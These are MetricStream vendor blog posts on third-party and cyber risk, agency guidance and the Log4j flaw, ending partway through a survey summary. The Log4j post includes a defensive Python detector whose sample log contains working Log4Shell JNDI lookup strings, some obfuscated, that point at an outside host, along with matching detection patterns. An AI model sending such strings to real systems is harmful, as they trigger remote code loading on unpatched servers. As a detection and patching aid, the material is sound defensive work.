Blogs

Cyber and Third-Party Risk Management: Critical for Business Resilience

cyber risk
5 min read

Introduction

A few months ago, I received a call from a person who introduced themselves as a call center executive from an online grocery store that I regularly shop with. They asked me to unblock my account by clicking on a link they had sent me, claiming that it had been blocked by mistake. As an apology, they promised to load INR 1,000 into my online wallet. To sound even more convincing, they furnished several particulars, such as details about my last orders, order numbers, etc. But I soon realized that my number was part of a contact list that had been purchased on the dark net and that I was being targeted by cyber criminals.

It is no longer just about customer data. The web of third parties that hold or process that data is spread so wide that the aftermath of a single compromise is hard to bound.

Today, the question is no longer ‘if you get attacked’ but ‘when you get attacked’. Zero trust is not just important but a necessity for businesses that want to stay ahead of the next attack vector. More importantly, cyber resilience is no longer just a matter of implementing tools and assuming you are safe. Businesses need to continuously monitor their controls, whether tools, people, or processes, to check that they are functioning as intended.

I recently had the opportunity to participate in a lively and insightful discussion on this very topic: Business Resilience with Cyber and Third-Party Risk Management.

Some of the discussion points included:

  • The expanding third-party risk landscape and the resulting challenges and threats
  • The adoption of emerging technologies as key enablers in building cyber resilience
  • The importance of businesses driving risk-aware business decisions

Watch the Webinar: Business Resilience with Cyber and Third-Party Risk Management

Here are the key highlights of our discussion.

 

Cybersecurity Risks from the Extended Enterprise are Bringing New Challenges

Along with the increased dependency on third parties and suppliers brought on by accelerated digitalization and the sudden shift to remote working, the risk of cyberattacks has also increased. More importantly, in today’s complex world cyber risk extends beyond third and fourth parties. The SolarWinds breach, in which as many as 18,000 of the company’s customers installed a trojanized Orion update and were exposed to follow-on intrusions, is a clear example.

Additionally, companies going through mergers and acquisitions face, or pose, a heightened threat to cybersecurity. In a recent FBI advisory, the bureau reported that at least three publicly traded companies in the US were attacked by ransomware while in the middle of a merger or acquisition deal.

As a result, CIOs and CISOs are facing several challenges including:

  • Strengthening data protection: given how much data is shared with third parties, it is imperative to strengthen the cybersecurity posture of the extended enterprise and to continuously monitor third-party and supplier cybersecurity risks
  • Ensuring vendor cybersecurity standards are being maintained, especially since 93% of CIOs and CISOs are currently in the process of digital transformation
  • Bridging the IT skills gap, as IT security teams face an acute shortage of people and skills
  • Aligning culture with strategy, as an organization’s employees can become its weakest link if they are not trained to handle day-to-day threats such as phishing
  • Preparing for emerging technologies and risks, especially as risks are becoming ever more interconnected
 

 

Cyber Resilience Needs to be Built Leveraging the Right Tools and Technology

Fueled by increased digitalization, cyberattacks and data breaches, and post-pandemic remote working, building cyber resilience is now a top agenda item for businesses around the globe. Organizations understand that cyberattacks, like other business risks, are inevitable, and that strategies must be formulated to manage and mitigate them.

This has resulted in organizations investing in new tools and technologies that enable:

  • Cyber risk quantification, which expresses cyber risk in monetary terms and so helps not just in preparing for loss scenarios but also in prioritizing and optimizing cyber investments
  • Front-line empowerment, since employees can make or break a zero-trust program; proper training and easy-to-use reporting tools are vital
  • Anomaly identification with AI/ML, which reduces routine human intervention, surfaces anomalies more easily, and frees analysts for deeper analysis

An Integrated Risk Management Approach is Vital to Driving Risk-Aware Decisions

The key objective of risk assessments is not just to determine your total risk exposure but to use it to drive strategic business decisions. However, most organizations treat risk assessments as a box to tick and stop at periodic assessments. Done right, risk and control assessments that use both qualitative and quantitative methods provide meaningful insight. For this, you will need more than a software solution that manages a huge data set.

Your organization will need:

  • Strong reporting and analytics capabilities to translate data sets into meaningful insights
  • Processes and technologies to transfer the risk ownership to the front line
  • Cyber risk quantification and advanced risk analytics such as scenario analysis, stress testing, and what-if analysis

Interested to learn more?

Watch the Webinar: Business Resilience with Cyber and Third-Party Risk Management

 

Thrive on Risk with MetricStream

At MetricStream, we empower organizations on their risk management journey: from managing risk to embracing risk to thriving on risk. MetricStream ConnectedGRC enables organizations to take an integrated approach to risk management. With a connected and collaborative approach, your organization is better able to identify, assess, manage, and mitigate strategic risks, operational and enterprise risks, IT and cyber risks, third-party risks, compliance risks, and environmental, social, and governance (ESG) risks.

Request a demo now.

You may also want to read:

Third-Party Risk: A Turbulent Outlook Survey Report 2022

Power What’s Next by Measuring Cyber Security Risks: A Deep-dive Guide Into Cyber Risk Quantification

The Ripple of Effects of Log4J: How You Can Stay Prepared and Resilient


Sumith Sagar Associate Director, Product Marketing

Sumith Sagar is a proven product marketing professional, specializing in software product positioning, product-led growth marketing, presales and sales enablement. With over 12 years of risk management solutioning experience ranging from Governance, Risk and Compliance (GRC) and Commodity Trading & Risk Management (CTRM) to cybersecurity, she has been instrumental in driving BusinessGRC product marketing at MetricStream.

 
Blogs

Boost Cyber Resilience – Here’s What Cybersecurity Agencies are Recommending

cyber risk
4 min read

Introduction

In today’s digitized era, businesses exist not only in the physical world but also in the virtual world. Some companies exist only in the virtual world – all it takes is a website and a connection to get started. Today, we work from anywhere, across networks and devices. While this has significantly improved the ease of doing business, we are now exposed to cyber risk more than ever.

In this hyper-connected business environment, with high digital dependencies among organizations, a cybersecurity incident at one organization can quickly spread to the businesses connected to it. What makes the situation worse is that data breaches often go undetected until it is too late. According to IBM’s Cost of a Data Breach Report 2021, it takes 287 days on average to identify and contain a data breach.

The need to strengthen cyber defenses and safeguard critical organizational assets cannot be overstated. So, what steps can your organization take right now to become more cyber resilient?

Useful Advice from U.S., U.K. and EU Governments

Governments and security agencies regularly issue regulations, frameworks, and guidance to help organizations amp up their cybersecurity measures. Here are some of the prominent regulatory bodies around the world and the advice they have to share.

Protect Against Ransomware with NIST

In the U.S., the National Institute of Standards and Technology (NIST) published a draft Cybersecurity Framework Profile for Ransomware Risk Management, providing guidance to organizations on preventing, responding to, and recovering from ransomware attacks.

More recently, the agency announced plans to revise the Cybersecurity Framework itself to keep up with the evolving threat landscape, and published the final version of the profile as NISTIR 8374, Ransomware Risk Management: A Cybersecurity Framework Profile.

“This Ransomware Profile can help organizations and individuals to manage the risk of ransomware events. That includes helping to gauge an organization’s level of readiness to counter ransomware threats and to deal with the potential consequences of events. The profile can also be used to identify opportunities for improving cybersecurity to help thwart ransomware,” the document reads.

For a deeper dive into NIST’s Cybersecurity Framework, click here.

Ongoing Advice from CISA and the FBI

Elevated cyber risk is a key concern to the U.S. government, and they regularly issue guidance and best practices. The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the National Security Agency (NSA) are all good sources to follow. Top recommendations to improve your cyber-resilience include:

  • Require multi-factor authentication
  • Ensure that all software is up to date, especially software with known vulnerabilities
  • Implement strong controls and policies
  • Focus on identifying and quickly assessing any unexpected or unusual network behavior
  • Ensure antivirus/antimalware software is up to date
  • Designate a crisis-response team
  • Assure availability of key personnel
  • Conduct a tabletop exercise
  • Test backup procedures
  • Test controls

UK

In the UK, the National Cyber Security Centre (NCSC), a part of the Government Communications Headquarters (GCHQ), has also highlighted actions to take when the cyber threat is elevated, including: 

  • Check system patches to ensure they are up to date
  • Verify access controls
  • Ensure defenses like anti-virus software are working
  • Log and monitor incidents
  • Review backups
  • Ensure that your incident management plan is current
  • Check and perform a vulnerability scan of your internet footprint

EU

In the EU, the European Union Agency for Cybersecurity (ENISA) and CERT-EU have jointly issued a set of cybersecurity best practices for public and private organizations. This set of practices overlaps with the above and also includes some distinct recommendations:

  • Maintain tight control over third-party access to your internal networks and systems, so that an attack can be prevented or detected should a third party be compromised.
  • Pay special attention to hardening your cloud environments.
  • Review your data backup strategy and use the so-called 3-2-1 rule: keep three complete copies of data, with two of them stored locally but on different types of media, and at least one copy stored off-site.
  • Conduct regular training to ensure that IT and system administrators have a solid understanding of security policy and associated procedures.
  • Block or severely limit internet access for servers or other devices that are seldom rebooted, as they can be used to establish back-door access.

Now is the time to strengthen your organization’s cyber defense mechanism and protect against the looming cyber threats.

What Else Can Cybersecurity Teams Do to Build Resilience?

Encourage a security-aware mindset among employees. Strong passwords, multi-factor authentication, a virtual private network (VPN) for remote access, and similar measures go a long way toward improving organizational security. Security teams must also back up critical data and information.

Closely monitor IT vendors and third parties. Third parties and vendors can serve as an entry point for a breach or attack. Security teams must identify IT vendors, classify them into “critical” and “non-critical” categories based on their access to organizational assets, perform due diligence, and raise red flags on an ongoing basis.

Implement strong policies and controls, and gain visibility across your risks. Define and maintain business entities such as IT risks, assets, threats, vulnerabilities, processes, and controls in a central repository, and regularly test and monitor controls for effectiveness.

Explore how MetricStream can help – click here to request a personalized demo.

You may also be interested in:

Best Practices to Ensure Effective IT & Cyber Risk Management

Five Critical Capabilities for Effective Cyber Risk Management

For more advice, please contact us at info@metricstream.com.


Patricia McParland AVP – Marketing

Pat McParland is AVP of Product Marketing at MetricStream. She is responsible for creating product messaging, product go-to-market plans, and analyzing market trends for MetricStream's cyber compliance and third party risk product lines. Pat has more than 25 years of financial data and technology marketing experience at Fortune 1000 brands as well as startups and has led product and marketing teams at Dow Jones and Dun & Bradstreet. She has a BA from the College of William and Mary and lives in Summit, New Jersey.

 
Blogs

The Ripple of Effects of Log4J: How You Can Stay Prepared and Resilient

Cyber 1
5 min read

Introduction

Since the Log4j vulnerability (CVE-2021-44228, widely known as Log4Shell) became public in early December 2021, security vendors have reported more than 100 new exploitation attempts every minute.

So, what is Log4j, and why is this flaw being called one of the worst vulnerabilities in history?

How can it affect your organization, your cyber risk exposure, and how you assess your third parties and vendors?

What are the steps you can take to mitigate this urgent cybersecurity risk?

We bring you the answers to these critical questions.

A Vulnerability in a Widely Used Bit of Software

Log4j is an open-source Java logging library maintained by the Apache Software Foundation. Freely available open-source components like Log4j are used by programmers as building blocks for common tasks; Java programmers use Log4j to write a log of what an application does as it runs. Log4j 2 does more than copy a message string to a file, however: it also scans the message for lookup expressions of the form ${...} and resolves them at log time, for example to insert the current date or an environment variable.

The vulnerability, tracked as CVE-2021-44228 and nicknamed Log4Shell, abuses that lookup feature. A ${jndi:...} expression in any logged string causes affected versions to contact a server named in the expression over JNDI (typically LDAP or RMI) and to load and run the Java class that server returns.

The consequence: anything an outside party can get written into a log line, such as an HTTP User-Agent header, a username, or a chat message, lets a remote server supply code that runs on the targeted computer, including stealing data, taking control of the system, and installing malware. This allows attackers to take over web servers and other exposed services remotely.
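As an added example (not code from the original post or from the Apache project), here is a small Python detector that runs over a constructed sample of web-server access-log lines and flags the ${jndi:...} lookup strings used to trigger CVE-2021-44228. Attackers quickly began hiding the keyword behind other Log4j lookups (${lower:j}, ${::-j}, ${env:X:-j}), so the detector first collapses those nested lookups inside-out, the way Log4j would, before matching. The addresses and log lines are constructed, and only the lower/upper and default-value lookups are emulated; that choice of evasions is an assumption, not an exhaustive list.

```python
import re
from typing import Dict, List, Optional

# Constructed sample of an Apache-style access log (documentation-range addresses, not real traffic).
# Lines 2-4 carry Log4Shell probes in the User-Agent or query string; line 5 is a benign lookup.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2021:13:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Dec/2021:13:01:07 +0000] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://198.51.100.7:1389/a}"
203.0.113.9 - - [10/Dec/2021:13:01:09 +0000] "GET /api HTTP/1.1" 404 0 "-" "${${lower:j}${upper:n}di:${::-l}dap://198.51.100.7/x}"
203.0.113.9 - - [10/Dec/2021:13:01:11 +0000] "GET /?q=${${env:NOPE:-j}ndi:rmi://198.51.100.7/y} HTTP/1.1" 200 9 "-" "curl/7.68.0"
198.51.100.2 - - [10/Dec/2021:13:02:00 +0000] "GET /docs/${date:yyyy} HTTP/1.1" 200 20 "-" "Mozilla/5.0"
"""

_INNERMOST = re.compile(r"\$\{([^${}]*)\}")          # a ${...} with no nested ${...} inside it
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)", re.IGNORECASE)


def _resolve(body: str) -> Optional[str]:
    """Emulate the two Log4j lookup behaviours attackers use to hide the word 'jndi'.

    ${anything:-default} yields the default when the lookup is unknown or empty, and
    ${lower:x} / ${upper:x} change case. Any other lookup is left untouched (None)."""
    if ":-" in body:
        return body.split(":-", 1)[1]
    name, sep, arg = body.partition(":")
    if sep:
        if name.strip().lower() == "lower":
            return arg.lower()
        if name.strip().lower() == "upper":
            return arg.upper()
    return None


def normalize(text: str, max_rounds: int = 20) -> str:
    """Collapse nested lookups from the inside out until nothing more resolves."""
    for _ in range(max_rounds):
        changed = False

        def repl(m: "re.Match") -> str:
            nonlocal changed
            out = _resolve(m.group(1))
            if out is None:
                return m.group(0)
            changed = True
            return out

        text = _INNERMOST.sub(repl, text)
        if not changed:
            break
    return text


def scan_log(log_text: str) -> List[Dict]:
    """Return one finding per line whose normalized form contains a JNDI lookup."""
    hits = []
    for lineno, raw in enumerate(log_text.splitlines(), start=1):
        norm = normalize(raw)
        m = _JNDI.search(norm)
        if m:
            hits.append({"line": lineno, "scheme": m.group(1).lower(),
                         "normalized": norm[m.start():m.start() + 60], "raw": raw})
    return hits


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f"line {h['line']}: jndi via {h['scheme']} -> {h['normalized']}")
```

Matching the raw line for the literal string "jndi" would miss lines 3 and 4; normalizing first is what makes the obfuscated probes visible. The scheme captured (ldap, rmi, dns) tells the responder which outbound connection to look for in firewall or DNS logs.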

Widespread Impact Due to its Simplicity to Exploit

The fact that Log4j is a common component in millions of devices, combined with how simple the flaw is to exploit, makes it a grave concern. Log4j is widespread in cloud services, video games, industrial and hospital equipment, and in software and security tools themselves.

This leaves potentially every system running an affected Log4j 2 version open to attack, putting almost everyone at risk: governments, corporate systems, and individuals.

For enterprises, risk exposure to the Log4j vulnerability is even greater.

With the global increase in employees working from home during the pandemic, the risk of company data on personal devices being compromised unknowingly grows. There is a very real risk of attackers exploiting the vulnerability in “shadow IT” appliances, those not centrally managed and therefore not patched.

Key suppliers, vendors, third-party providers, and even fourth-party providers of enterprises who are part of the supply chain and provide critical support could also serve as a source for Log4j vulnerability exploitation.

Since Log4j is used in much critical supporting infrastructure, such as cloud platforms, web applications, and email services, a wide range of systems could be at risk. Community-maintained lists of vulnerable applications and systems have been published on GitHub.

Moreover, most large organizations will also need to be aware of the risk from any of their own products that may have been built with enterprise Java software that legitimately used Log4j.

Next Steps: Addressing the Log4j Vulnerability

State-sponsored and cyber-criminal attackers have been exploiting the Log4j flaw throughout the month of December 2021 and continue to do so.

It is important to be aware that it is difficult to find Log4j within your organization’s software estate, because this open-source component is often “bundled” inside other software (for example, inside a vendor’s .war or .jar), so asset inventories and package managers rarely list it. Companies may not even realize they are exposed.

Beyond immediate mitigations, the durable fix is to upgrade every copy of log4j-core to a patched release (2.17.1 or later, with 2.12.4 and 2.3.2 as the back-ports for the Java 7 and Java 6 branches) and to use scanning tools to find remaining copies and assess your exposure. A further review of devices where vulnerable installations might exist, such as appliances, embedded systems, and vendor-supplied images, will also be needed.
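As an added example, not code from the original post or from any vendor, the following Python script shows the inventory step described above: it walks a directory tree, opens every .jar/.war/.ear/.zip it finds, recurses into archives nested inside them, and reports each copy of log4j-core by the version recorded in its Maven pom.properties and by whether JndiLookup.class is still present (removing that class was the widely used interim mitigation). The fixture it scans is constructed in a temporary directory with placeholder class bytes; the version thresholds (2.17.1, with 2.12.4 and 2.3.2 for the Java 7 and Java 6 branches) reflect the Apache releases current in early 2022 and are an assumption to check against the project’s security page before use.

```python
import io
import os
import re
import tempfile
import zipfile
from typing import Dict, List, Optional

ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def parse_version(v: str) -> tuple:
    """'2.14.1' -> (2, 14, 1); tolerant of suffixes such as '-rc1'."""
    return tuple(int(p) for p in re.findall(r"\d+", v)[:3])


def is_patched(version: Optional[str]) -> bool:
    """Assumption: fixed release lines as of early 2022 (2.17.1+, back-ports 2.12.4 and 2.3.2)."""
    if version is None:
        return False
    t = parse_version(version)
    if t[:2] == (2, 12):
        return t >= (2, 12, 4)
    if t[:2] == (2, 3):
        return t >= (2, 3, 2)
    return t >= (2, 17, 1)


def _status(version: Optional[str], has_jndi: bool) -> str:
    if is_patched(version):
        return "patched"
    if not has_jndi:
        return "mitigated (JndiLookup.class removed)"
    return "VULNERABLE"


def _scan_archive(zf: zipfile.ZipFile, display_path: str, findings: List[Dict]) -> None:
    names = set(zf.namelist())
    version = None
    if POM_PROPS in names:
        for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                version = line.split("=", 1)[1].strip()
    has_jndi = JNDI_CLASS in names
    if has_jndi or version is not None:
        findings.append({"path": display_path, "version": version,
                         "jndi_lookup_present": has_jndi, "status": _status(version, has_jndi)})
    # Recurse into archives bundled inside this one (e.g. WEB-INF/lib/*.jar inside a .war).
    for name in sorted(names):
        if name.lower().endswith(ARCHIVE_EXT):
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                    _scan_archive(inner, f"{display_path}!/{name}", findings)
            except zipfile.BadZipFile:
                continue


def scan_tree(root: str) -> List[Dict]:
    """Scan every archive under root; paths are relative to root, nested entries follow '!/'."""
    findings: List[Dict] = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            if fname.lower().endswith(ARCHIVE_EXT):
                full = os.path.join(dirpath, fname)
                try:
                    with zipfile.ZipFile(full) as zf:
                        _scan_archive(zf, os.path.relpath(full, root), findings)
                except zipfile.BadZipFile:
                    continue
    return sorted(findings, key=lambda f: f["path"])


def _fake_log4j_core(version: str, with_jndi: bool = True) -> bytes:
    """Constructed stand-in for log4j-core-<version>.jar: real entry paths, placeholder class bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr(POM_PROPS, f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        if with_jndi:
            z.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


def build_fixture(root: str) -> None:
    """Three constructed cases: old copy bundled in a .war, patched copy, old copy with the class stripped."""
    with zipfile.ZipFile(os.path.join(root, "app.war"), "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", _fake_log4j_core("2.14.1"))
    with open(os.path.join(root, "log4j-core-2.17.1.jar"), "wb") as fh:
        fh.write(_fake_log4j_core("2.17.1"))
    with open(os.path.join(root, "log4j-core-2.14.1-stripped.jar"), "wb") as fh:
        fh.write(_fake_log4j_core("2.14.1", with_jndi=False))


def demo() -> List[Dict]:
    """Build the fixture in a temporary directory, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_fixture(root)
        return scan_tree(root)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['status']:<40} {f['version'] or '?':<8} {f['path']}")
```

Point scan_tree at an application server’s deployment directory to get the same report for real archives. The nested path notation (app.war!/WEB-INF/lib/...) is what makes the bundled case visible, which a filename search for log4j-core*.jar on disk would miss entirely.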

How Can MetricStream Help?

MetricStream’s CyberGRC product can help you by:

  • Providing a centralized repository for all your threats and vulnerabilities, and streamlining management of these issues by bridging silos within your company
  • Assessing and managing your IT risks, including impact assessment of IT vendor risk exposure
  • Quantifying your cyber risk, locating where it sits, and running simulations to arrive at a more accurate value for it

MetricStream’s ConnectedGRC provides a proactive approach to compliance and risk management giving you the power to rapidly scale and adapt your programs to emerging and evolving risks. Built as an interconnected, intuitive, and intelligent GRC program, our CyberGRC product line enables your organization to collate data from across the enterprise, including third and fourth-party vendors, which can then be transformed into actionable business intelligence to support data-driven decision-making.

This will help your organization gain:

  • Real-time visibility into overall company risks and vulnerabilities, with a 360-degree view through reporting and dashboards
  • Improved efficiency by correlating vulnerabilities with IT assets, and prioritizing remediation efforts based on the highest levels of threats
  • Increased assurance especially from your tech partners
     

Want to learn more? Write to me at jbhowmick@metricstream.com to discuss how to mitigate your risk from the Log4j vulnerability.

Check out more resources related to cybersecurity:

The Ultimate Guide to Cyber Security and IT & Cyber Risk

Third-Party Risk: A Turbulent Outlook Survey Report 2022

Cyber Risk Quantification: Core Metrics for Success


Joy Bhowmick Senior Vice President, Product Development

Joy Bhowmick is Senior Vice President, Product Development at MetricStream, and has 20+ years of experience in leading institutional, retail, and commercial banking technology initiatives. He has delivered many solutions in Risk Management, Finance, Compliance, Cyber Security and Audit. He is known for his expertise in determining strategic financial direction, leveraging business and technical acumen to generate solutions for complex issues.

He specializes in championing strategic initiatives to deliver effective results, participating in critical decision-making processes while working proactively with cross-functional teams to drive competitive advantage. His mission is to stay committed to cultivating exceptional stakeholder relationships, meeting their needs and expectations at every step. His ability to provide exceptional service, resources, and methods to meet ever-changing objectives and ensure compliance with all regulatory requirements is what makes him the best at what he does.

 
Blogs

Cyber Risk Quantification: Core Metrics for Success

Cyber Series Blog: MSI
7 min read

Introduction

At the recently held MetricStream GRC Summit, October 2021, Gavin Grounds - Executive Director, GRC, Verizon, and Prasad Sabbineni - CTO, MetricStream, sat down for a fireside chat to discuss the implementation of quantification in risk management and how it can help CISOs and cyber security teams.

Gavin Grounds is the Executive Director for Governance, Risk, and Compliance at Verizon and has worked on risk management and cyber security [at Verizon] for over three years. He has previously worked at HP, DXC Technology, and other large organizations managing cyber security and compliance. He is also a chapter President of ISACA. As a cyber security risk professional, he has pioneered several leading concepts in cyber risk and risk quantification.

Prasad Sabbineni is Chief Technology Officer at MetricStream. He has previously worked at Citigroup and other leading banking organizations and has over 25 years of experience in risk management, compliance, and information security.

Read the abbreviated transcript to learn more about the meaning of cyber risk quantification, the need for cyber risk quantification, the current state of cyber security metrics, and how quantification will benefit Risk Officers, CISOs and security teams.

The Current State of Risk Measurement

Prasad Sabbineni: Gavin, can we start with why it is so critical to quantify cyber risk?

Gavin Grounds: I think presently, most cyber security teams still use varying approaches based on gradients and colours, such as low, medium, high and critical or red, amber, and green to measure. However, these indicators are vague owing to the vastly complex world of cyber risk and don’t effectively support the business. In almost all other areas of business, we use actual numbers to express the level of risk associated with a specific business aspect. In general, the cyber security community is still lagging in this regard.

Prasad Sabbineni: The use of such vague indicators makes it difficult to identify the actual severity of an event. The fact that it is difficult to assess how high is ‘high’ or how red is ‘red’ renders these tools futile.

Gavin Grounds: To better manage risk, companies must make quantification of risk a prerequisite in developing and executing cyber security strategies. It is essential to assign figures and statistics to threats and to calculate risk in terms of numbers. The use of indicators such as gradients, levels, or categories does not do justice to the process of cyber risk management.

The Need for Risk Quantification

Prasad Sabbineni: Why do risk managers need to quantify risks?

Gavin Grounds: While a cyber security framework is generally used to define the action plan of a security team, the role of risk management is to define why a particular plan exists in the first place – what does – or maybe even what does not – need to be done. Therefore, risk management justifies the need for a specific cyber defence strategy.

Prasad Sabbineni: Over the last 30 years, risk has evolved in several industries and in different ways. Market risk, compliance risk, and operational risk have all taken a new shape, resulting in a natural progression towards quantification.

Understanding Quantification

Gavin Grounds: When people talk about cyber risk quantification, many automatically start trying to calculate annualized loss expectancy (ALE). However, even though this method would work for other sectors, it remains an incomplete approach for managing cyber risk. ALE only looks at one aspect, i.e., what a potential loss might be; risk management requires a more holistic approach. Simply put, risk management is more about optimizing risk than reducing risk. The essence of business lies in taking a risk; the key is to understand which risks to take and how much risk to take.

The most significant drawback of only looking at ALE is witnessed when an enterprise needs to enable broader business opportunities, where it becomes imperative to increase the risk profile. The ALE approach is native to the insurance industry, which deals with a finite number of perils, where a limited number of scenarios result in those perils materializing. These are actually the statistics used by actuaries to calculate the premium they need to collect for the coverage provided.

For cyber security, however, there exists an infinite, or at least an ever-increasing number of perils that can be a result of an infinite number of scenarios. Owing to such vast possibilities, most CISOs and risk managers in the cyber security domain often tend to focus their efforts on identifying and managing the top 10 or 15 (or any other convenient figure) scenarios. However, the more significant risk associated with this approach is that the top risk might just be the 11th or the 16th one, i.e., the one that was ignored or not given due attention.

A Paradigm Shift in the Way Companies View Risk

Gavin Grounds: Risk must be treated as a different currency in itself. This can be done by assigning an empirical numeric value to an asset based on its business value, or its mission criticality (perhaps the crown jewel), along with the degree of exposure or susceptibility, or vulnerability. Quantification is when the risk is assigned such a numeric value. When there is a points-based system, risk currency can be mapped to the fiscal opportunity or fiscal loss probabilities, much like forex rates, to get a clear understanding of what we stand to lose and gain when a particular risk is taken or not taken.

Prasad Sabbineni: How can companies transform cyber risk management strategies through quantification?

Gavin Grounds: The universe of cyber security is so massive and complex and that is actually why quantification becomes so necessary. My advice is to Start with what you do have, Improve based on what you could have, and always Aspire to what you should have.

There is no single answer for everyone as to where one can begin quantifying. Except for that, the only place that you can start from is where you are. So, start there – start the quantification journey based on what you do know. The only way forward is to take action and make the best out of the current circumstances. Begin with the information already present with the organization, such as which business processes hold the highest value for an enterprise and which platforms and applications support these high-value processes. Next, these platforms and applications can be quantified in terms of the intrinsic value that they hold. We can also take all of the system and user activity log information and incorporate that into our calculation of an intrinsic numeric score (points) for risk quantification. An ideal way is to start small and protect the crown jewels, those systems that support the processes and assets with the highest business value and mission criticality, by quantifying associated risks before launching an all-out cyber risk quantification campaign.

In establishing this risk currency-based approach, using empirical numeric scoring, it allows us to then stack rank assets in terms of their value and potential exposure, so as to help then prioritize investment decisions, remediation activities, and the like. This approach to quantification also provides us with deeper insights into the overall operating risk of the environment, in near-real-time, that we don’t otherwise get from a model that is exclusively scenario-based focused on ALE.

You asked earlier about how risk quantification can help in major events, such as we have seen with the COVID-19 pandemic. I think the pandemic response has allowed many companies to assess their current exposure. For those companies, it has served to at least pressure-test existing risk management and control frameworks and has provided a good line of sight and opportunity to test methodologies for managing risk. For many, it has also potentially improved the depth and accuracy of information for managing the environment. Such opportunities must be leveraged to continuously pressure-test and improve existing systems and develop, or enhance metrics, for managing cyber risk.

Cyber Risk Quantification and Third-Party Risk

Prasad Sabbineni: Does quantification change the way companies manage risk associated with third parties? Any final thoughts and advice for CISOs?

Gavin Grounds: When the risk is quantified, third-party risk management changes completely. We need to have the same rigor and the same degree of telemetry over our third-party product and service providers as we do over our internal IT or delivery partners. The issue that many companies face with respect to third parties is that the techniques and the level of detail, or line of sight, that can be established for a third party are different than for an internal function or solution. Nonetheless, the need for quantification of risk doesn’t go away. In fact, it becomes even more important. We still can – and should – use an empirical numeric quantification methodology. Asking the right questions and seeking relevant information from third parties allows companies to identify those quantifiable indicators. This, in turn, enables a clearer assessment of third-party exposure while also bridging gaps in communication between different delivery entities.

CISOs have a lot on their plate, including cyber protection, changes in the threat landscape, regulatory compliance, meeting corporate or contractual obligations and oftentimes, everything is a priority. Having a solid, quantification-based risk management methodology can make all the difference in the world to a CISO. Risk management answers the “why?” of a cyber defence strategy, answering why specific steps are taken. Quantification helps CISOs answer the question “so what?” or “why does that matter?” When we have answered that question multiple times, we have essentially landed on a risk statement and quantification makes it easier for CISOs and security teams to prioritize what is needed to protect the business from perils, while simultaneously prioritizing based on their currency value.

Prasad Sabbineni: To summarize, even a simple line of questioning can come a long way in prioritizing risks and resources to manage the risks—making it all the more important for CISOs to start quantifying cyber risks.

Get the Full Transcript: Cyber Risk Quantification: Core Metrics for Success

Watch the Video


Aanya Sharan Associate Director - Marketing

Read the blogs authored by Aanya Sharan, Associate Director - Marketing, for the latest insights on governance, risk management, cyber resilience, and more.

 
Blogs

Making Third-Party Risk Foolproof. Is Your Organization Ready to Assess, Manage, and Remediate Third Party and Cyber Risk?

cyber
6 min read

Key Findings from Third-Party Risk: A Turbulent Outlook Survey Report 2022

“How can we make cybersecurity foolproof?” is a question I have been asked. My answer is always the same. When it comes to cybersecurity, thinking one can achieve a foolproof status is proof of being a fool. Cybersecurity can never reach a perfect state but is a continuous journey. The question asked should then be on how one should prioritize the journey.

This journey now includes third parties as well. Over the past few years, and especially since the pandemic began, organizations have relied increasingly on third parties, including vendors and suppliers, to meet business goals and gain a much-needed competitive advantage. But as organizations turn to outsourced services and software to make up for talent and supply shortages, they are also seeking effective ways to mitigate the elevated risk that third-party relationships bring.

To understand how organizations are prioritizing and managing third-party risk, MetricStream sponsored a study with CyberRisk Alliance that surveyed senior IT and cybersecurity decision-makers and influencers across industries on how well their organizations manage and mitigate the risks of third-party partnerships.

We learned a lot, above all that third parties remain a critical and sensitive risk factor for cyber incidents such as data breaches.

Who was surveyed?

301 IT and cybersecurity decision-makers and influencers from the United States and Canada (1%) were surveyed online in late fall 2021. Respondents were CISOs (35%), IT security directors or managers (49%), and administrators, analysts, and consultants (16%) across industries including business or professional services, manufacturing, retail or ecommerce, high-tech/IT, financial services and insurance, healthcare, government, non-profits, and energy and utilities. 64% worked at companies with fewer than 1,000 employees; the remaining 36% worked at larger organizations.

Participants were asked about their vendor relations, concerns, and challenges in managing risks, and the actions they are taking to combat third-party cyber risk.

Here are a few key highlights from the Third-Party Risk: A Turbulent Outlook Survey Report 2022:

The threat from partnerships has accelerated, with 60% of respondents hit through a third party

The past two years have seen a drastic increase in supply chain attacks, many of them well publicized, such as SolarWinds. The survey findings highlight an accelerated threat from IT vendors and third parties:

  • 60% of respondents experienced an IT security incident in the past two years caused by a third-party partner with access privileges
  • Those same organizations were also the most likely to have had sensitive data stolen or to have suffered some type of business outage
  • When it came to damages, some paid $1 million or more, and 45% incurred at least $100,000


Third-party risk mitigation and management have become a priority

Several factors, including the sudden onset of the pandemic, large numbers of employees working from home, and the more recent wave of resignations termed “The Great Resignation”, have left organizations increasingly dependent on IT vendors and third parties.

IT leaders recognize the elevated risk from outsourcing elements of IT functionality.

  • 76% of respondents stated that managing third-party risk was a high or critical priority
  • 70% ranked cyber as the No. 1 or No. 2 risk among their third-party/supply chain partners

The result of this heightened risk awareness is that most IT and cybersecurity teams have increased their budgets as well. Nearly half (49%) of all organizations have increased spending to improve third-party risk management programs.

Effective cyber third-party risk management remains a challenge

Although most IT and cybersecurity leaders are aware of the elevated risk from third-party partnerships, they are faced with multiple challenges when it comes to ensuring effective cyber vendor risk management.

Common challenges cited by survey respondents include:

  • Lack of qualified staff to implement a third-party management solution
